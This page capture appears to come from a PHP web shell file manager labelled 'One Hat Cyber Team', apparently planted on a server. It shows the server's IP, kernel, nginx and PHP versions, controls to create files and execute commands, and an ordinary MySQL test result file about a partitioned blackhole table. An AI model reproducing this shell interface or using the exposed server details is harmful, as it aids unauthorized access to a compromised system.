⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
mysql
/
mysql-test
/
r
/
View File Name :
partition_not_blackhole.result
DROP TABLE IF EXISTS t1; # # Bug#46086: crash when dropping a partitioned table and # the original engine is disabled # Copy a .frm and .par file which was created with: # create table `t1` (`id` int primary key) engine=blackhole # partition by key () partitions 1; SHOW TABLES; Tables_in_test t1 SHOW CREATE TABLE t1; ERROR HY000: Incorrect information in file: './test/t1.frm' DROP TABLE t1; ERROR 42S02: Unknown table 'test.t1' t1.frm t1.par